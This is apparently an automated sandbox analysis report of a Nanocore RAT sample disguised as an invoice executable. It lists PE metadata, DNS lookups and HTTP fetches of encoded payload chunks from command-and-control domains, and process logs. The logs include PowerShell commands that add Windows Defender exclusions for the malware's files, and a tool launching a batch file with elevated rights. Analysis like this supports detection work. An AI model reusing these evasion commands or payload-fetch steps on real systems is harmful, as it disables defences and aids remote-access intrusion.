                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al

                                                                                                              Data Directories

                                                                                                               Name | Virtual Address | Virtual Size | Is in Section
                                                                                                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9694 | 0x57 | .text
                                                                                                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x3e0 | .rsrc
                                                                                                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8000 | 0x1478 | .text
                                                                                                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc000 | 0xc | .reloc
                                                                                                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                                                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                                                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                                                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                              Sections

                                                                                                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                                                               .text | 0x2000 | 0x76f4 | 0x7800 | False | 0.374055989583 | data | 4.93746742515 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                               .rsrc | 0xa000 | 0x3e0 | 0x400 | False | 0.46875 | data | 3.52295456663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                               .reloc | 0xc000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                               Name | RVA | Size | Type | Language | Country
                                                                                                               RT_VERSION | 0xa058 | 0x388 | data | English | United States

                                                                                                              Imports

                                                                                                               DLL | Import
                                                                                                               mscoree.dll | _CorExeMain

Version Infos

Description | Data
LegalCopyright | Copyright 2022 MElPBjWh. All rights reserved.
Assembly Version | 0.0.5.0
InternalName | NbTfoyms.exe
FileVersion | 7.5.8.1
CompanyName | KlNrqpbB
LegalTrademarks | ZAYgcLMa
Comments | SArWMDgi
ProductName | NbTfoyms
ProductVersion | 0.0.5.0
FileDescription | GFZIgBqf
OriginalFilename | NbTfoyms.exe
Translation | 0x0409 0x0514

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets


UDP Packets


DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 15:09:58.368985891 CET | 192.168.2.4 | 8.8.8.8 | 0x395a | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:09:59.361884117 CET | 192.168.2.4 | 8.8.8.8 | 0x395a | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.233695984 CET | 192.168.2.4 | 8.8.8.8 | 0x20c9 | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.718133926 CET | 192.168.2.4 | 8.8.8.8 | 0xc8c | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:36.266458988 CET | 192.168.2.4 | 8.8.8.8 | 0x582e | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:55.282066107 CET | 192.168.2.4 | 8.8.8.8 | 0xc439 | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:12:14.123791933 CET | 192.168.2.4 | 8.8.8.8 | 0x36af | Standard query (0) | nanopc.linkpc.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 25, 2021 15:09:59.421478033 CET | 8.8.8.8 | 192.168.2.4 | 0x395a | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:09:59.421478033 CET | 8.8.8.8 | 192.168.2.4 | 0x395a | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.292831898 CET | 8.8.8.8 | 192.168.2.4 | 0x20c9 | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:28.292831898 CET | 8.8.8.8 | 192.168.2.4 | 0x20c9 | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.775327921 CET | 8.8.8.8 | 192.168.2.4 | 0xc8c | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:10:40.775327921 CET | 8.8.8.8 | 192.168.2.4 | 0xc8c | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:36.427895069 CET | 8.8.8.8 | 192.168.2.4 | 0x582e | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:11:55.443322897 CET | 8.8.8.8 | 192.168.2.4 | 0xc439 | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:12:14.186263084 CET | 8.8.8.8 | 192.168.2.4 | 0x36af | No error (0) | nanopc.linkpc.net | | 157.97.120.21 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• coroloboxorozor.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49722 | 172.67.172.17 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:09:59.512818098 CET | 3777 | OUT | GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 25, 2021 15:09:59.651695013 CET | 3779 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:09:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d874c778fd4511dc72e62286c184f05a41614262199; expires=Sat, 27-Mar-21 14:09:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
last-modified: Wed, 24 Feb 2021 19:31:15 GMT
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b1f7cfe0000c867daaee000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=j8IazhNMg77%2FDC1bDYDx8mGOoLFx0A8MoiG9INqFFjh926qrcn%2BnWB8Q3%2FSEGU%2FK4Rfw%2BkKDTgIPRwyGW2PVX7TmFpJdyQtqgFYQGPJxy66DwMnH"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627201db2e1fc867-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:00.051585913 CET | 4841 | OUT | GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:00.181399107 CET | 4842 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:10:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2878a0d6029ba23ea7ff699e275fcdd01614262200; expires=Sat, 27-Mar-21 14:10:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b1f7f170000c86706390000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nH%2FcEGrKbhT%2BSE0IaOang1ZWsHreTkZayeW9jdPdQTOMDOCpfCJLnQ5pbIolDidnnEmbnQCJHPNrer49bCPjKc5PXpgkpb0ZOZts1QmoBonXRtbq"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627201de8ba5c867-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:00.454377890 CET | 5904 | OUT | GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:00.596854925 CET | 5906 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:10:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2878a0d6029ba23ea7ff699e275fcdd01614262200; expires=Sat, 27-Mar-21 14:10:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b1f80ab0000c867fda5c000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pSys8V33zYUGeef8OpVOg3DRwjwcsJn66s1cYn5SYI6fdDzD1zEKwHvzt6SOqA2kg1TH1zCSP2SNlsoi%2FxqyegbJfPRj50iepNQaDWv7EtG1DCq1"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627201e11fd8c867-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49728 | 172.67.172.17 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:10:28.487386942 CET | 5976 | OUT | GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 25, 2021 15:10:28.581510067 CET | 5982 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:10:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=ddc4cb048fa245a5afafeb32bd14c9e1c1614262228; expires=Sat, 27-Mar-21 14:10:28 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Wed, 24 Feb 2021 19:31:15 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b1fee2f0000203f9383c000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=7MKTBMU4YfWYCaOt8P7saLZdxjONpJmh1hloFvSdLTNaoS9xVbWVJAdMa02ylGpidZHWyBYy%2FAZKoAlbPgVIL3zy27zDh0FJ9rXnmKGM1YWB%2FQTg"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627202904d47203f-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:29.119402885 CET | 7049 | OUT | GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:29.206423044 CET | 7051 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:10:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2e96d585ba32558ef1a56ad0279a3a941614262229; expires=Sat, 27-Mar-21 14:10:29 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b1ff0a30000203f9326a000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mGcf6%2FLwbnC77V8a5IbltRI1hOsP6JHBGZtvG%2BZCsRThBu0FOqcFALKKkYCJ2tG7TwDSBo0t2QZQOsyNZ5a0CLMJwGcNMFWA0REKiaM8ya4hWEnV"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627202943f27203f-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Feb 25, 2021 15:10:41.261621952 CET | 8594 | OUT | GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:41.343542099 CET | 9183 | IN | HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:10:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df968e9bc436d32b19e2bf562890136031614262241; expires=Sat, 27-Mar-21 14:10:41 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
last-modified: Wed, 24 Feb 2021 19:31:20 GMT
vary: Accept-Encoding
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b2020110000203fa7aec000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nINWiXu%2BwXd%2Fbx8d2B9lkv6YSUK9dbz5%2FTyDXZtbIKdI6DIgAakgloFv8oHWvAujXs5Ndt2aT%2FyFA%2BK2Tb3C4tPPqQT7cNaozpOCsU2u6mOnBP51"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 627202e01fa7203f-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Ascii: 4c53<p>TSNKSyCTSzySyCTSzNSyCTSLySyCTSLKSyCTSySyySbySKSbLSKSbbSKSbTSKSbsSKSKSLbSNQSyQTSyKNSyQTSyLLSyQTSyLsSyQTSyyTSyQTSyKNSyQTSQySyQTSyyySyQTSyLySyQTSyKNSyQTSyKsSyQTSyKzSyQTSySyySbCSKSsNSKSsQSKSbTSKSbySKSKSyQSLsQSbCSLszSbCSLbKSbCSLsLSbCSLsbSbCSyNCSbCSyNySbCSyNCSbCSyNySbCSySyySsQSKSbySKSbbSKSsNSKSsQSKSKSbySyQSLySsQSLySTsSLySLbSLySsbSLySbNSLySbCSLySbKSLySsQSLySTCSLySTsSLySCKSLySsQSLySTCSLySbQSLySTbSLySTLSLySszSLySsQSLySCySLySTsSLySTLSLySsQSLySsbSLySbzS


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49731 | 172.67.172.17 | 80 | C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:10:40.880906105 CET | 8125 | OUT | GET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 25, 2021 15:10:40.968910933 CET | 8126 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d1debf37db94f80ca7bce3e750e3ab5571614262240; expires=Sat, 27-Mar-21 14:10:40 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b201e9600000b47bc8f1000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MwPbrpXDhEBhwbK7Fy9d%2B9tYP8e8hX0onlKmyOV4AaZpLWks95hE%2BbF96ssBOoRRFCvsUJJic6%2BG%2BPKcKiHp7NmuDMEMYXW0eN2Tb7926Cvi5IGq"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202ddbe020b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Ascii: 6d5d<p>zzSQKSyssSKSCSKSKSKSsSKSKSKSLbbSLbbSKSKSyNsSKSKSKSKSKSKSKSTsSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSyLNSKSKSKSysSCySyNTSysSKSyNKSQSLKbSCCSyNsSySzTSLKbSCCSNsSyKsSyKbSyybSCLSyyLSyysSyyySyKCSyysSQzSyKQSCLSQQSQzSyyKSyyKSyyySyyTSCLSQNSyKySCLSyysSyyzSyyKSCLSyKbSyyKSCLSTNSzQSNCSCLSyKQSyyySyKKSyKySsTSyCSyCSyKSCTSKSKSKSKSKSKSKSNKSTQSKSKSzTSySCSKSzTSysLSsySyNKSKSKSKSKSKSKSKSKSLLsSKSCsSKSyySySNKSKSKSyLsSyKSKSKSTSKSKSKSKSKSKS
Feb 25, 2021 15:10:41.431864023 CET | 9210 | OUT | GET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:41.502985001 CET | 9211 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d8daac7e5cc4bd1a2c1eb452b4bd80fc71614262241; expires=Sat, 27-Mar-21 14:10:41 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2020bd00000b47eea8e000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xzufLKqwaALRfH8o918HoyhzuWlwbR3XuNNztF73J4jbX6yNSkfid29l7DPGsxGmMgCu7yk7vzUc8AdY%2BP1pOu%2BN9Y0pz%2FEieQrVdxEDxhobteZc"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202e12c6d0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Ascii: 3274<p>ySyCsSybCSzbSyyQSybSTbSybySQTSNNSLsQSybbSyTNSsTSCzSTLSQsSbNSyCSsCSTySLKKSyTzSyLySLySzKSyLySyLSTSLCTSyNSNySLssSyNbSLCKSyNySTsSyCbSyzNSyCKSQKSyCTSyzCSzQSyKCSLsKSLbsSLySyCySQzSLyySsbSyyLSssSyQLSyKCSsQSyTySyQTSLKzSyNySbQSLCLSTCSLbKSLyLSyQLSzTSLLCSyTbSyKsSLyNSybsSbKSQCSyTNSysbSLKNSCQSTsSyLySybySQSLsCSQNSyLbSLbySNbSzCSLKsSTKSLSQNSzNSLyTSsQSbNSLyTSLKsSLybSLCLSKSbQSyCCSLKSLbSNLSyNNSLyLSNbSyzKSbsSTNSzLSyKTSzNSLKsSLQSyKbSyLKSyQQSyNySLsQSTQSyyLSyCbSLLCSbzSQ
Feb 25, 2021 15:10:53.715553045 CET | 10317 | OUT | GET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
Host: coroloboxorozor.com
Feb 25, 2021 15:10:53.783530951 CET | 10318 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d4de44723b8acb5b852a68d7a1c6b68e81614262253; expires=Sat, 27-Mar-21 14:10:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2050b700000b47aeb3d000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RRpam08yb21ui9neTxb3iQ33jNbBtw8bAbyWjMcY4Lal4h4WZ5WnAzJt1lTGKu1juY69r0PXKBEB7JPYhumOSVGv3wffU6HNIo1lVmcrfHF92vAN"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 6272032dff3e0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Ascii: 4c53<p>TSNKSyCTSzySyCTSzNSyCTSLySyCTSLKSyCTSySyySbySKSbLSKSbbSKSbTSKSbsSKSKSLbSNQSyQTSyKNSyQTSyLLSyQTSyLsSyQTSyyTSyQTSyKNSyQTSQySyQTSyyySyQTSyLySyQTSyKNSyQTSyKsSyQTSyKzSyQTSySyySbCSKSsNSKSsQSKSbTSKSbySKSKSyQSLsQSbCSLszSbCSLbKSbCSLsLSbCSLsbSbCSyNCSbCSyNySbCSyNCSbCSyNySbCSySyySsQSKSbySKSbbSKSsNSKSsQSKSKSbySyQSLySsQSLySTsSLySLbSLySsbSLySbNSLySbCSLySbKSLySsQSLySTCSLySTsSLySCKSLySsQSLySTCSLySbQSLySTbSLySTLSLySszSLySsQSLySCySLySTsSLySTLSLySsQSLySsbSLySbzSLySySQSbCS


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Start time:15:09:56
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
                                                                                                              Imagebase:0xbf0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
• Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Start time:15:10:09
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Start time:15:10:11
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:15:10:18
Start date:25/02/2021
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
Imagebase:0xae0000
File size:430592 bytes
MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:true
Has administrator privileges:true
Programmed in:.Net C# or VB.NET
Reputation:high

General

Start time:15:10:18
Start date:25/02/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:19
Start date:25/02/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:0x11d0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:19
Start date:25/02/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff724c50000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:15:10:19
Start date:25/02/2021
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout 1
Imagebase:0x13a0000
File size:26112 bytes
